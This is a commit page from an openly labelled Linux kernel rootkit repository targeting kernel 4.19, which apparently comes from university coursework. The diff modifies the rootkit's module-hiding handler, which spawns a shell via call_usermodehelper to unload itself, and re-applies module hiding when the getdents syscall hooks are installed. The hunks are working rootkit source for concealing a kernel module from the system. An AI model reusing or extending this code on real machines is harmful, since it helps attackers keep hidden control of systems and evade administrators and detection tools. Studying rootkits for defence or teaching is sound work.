linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 74c031701e4a40b481853236b4324d5b4d691447
parent 2cf933f2f4d97285198b35564c9dd2ef07b86a90
Author: deurzen <m.deurzen@tum.de>
Date:   Sat,  5 Dec 2020 18:30:19 +0100

fixes issues

Diffstat:
Msrc/channel.c | 13+++++++------
Msrc/hook.c | 3+++
2 files changed, 10 insertions(+), 6 deletions(-)

diff --git a/src/channel.c b/src/channel.c @@ -69,13 +69,10 @@ handle_modhide(unsigned long arg) long sarg = (long)arg; if (!sarg) { - char buf[BUFLEN]; - sprintf(buf, "/sbin/rmmod %s", G7_DEVICE); - - char *argv[] = { + static char *argv[] = { "/bin/sh", "-c", - buf, + "/sbin/rmmod g7", NULL }; @@ -91,9 +88,13 @@ handle_modhide(unsigned long arg) call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } else if (sarg < 0) { unhide_module(); - DEBUG_NOTICE("unhiding pid %ld\n", -sarg); + rootkit.hiding_module = 0; + + DEBUG_NOTICE("modhide off\n"); } else if (sarg > 0) { hide_module(); + rootkit.hiding_module = 1; + DEBUG_NOTICE("modhide on\n"); } diff --git a/src/hook.c b/src/hook.c @@ -57,6 +57,9 @@ init_hooks(void) sys_getdents = (void *)sys_calls[__NR_getdents]; sys_getdents64 = (void *)sys_calls[__NR_getdents64]; + if (rootkit.hiding_module) + hide_module(); + if (rootkit.hiding_files) hide_files();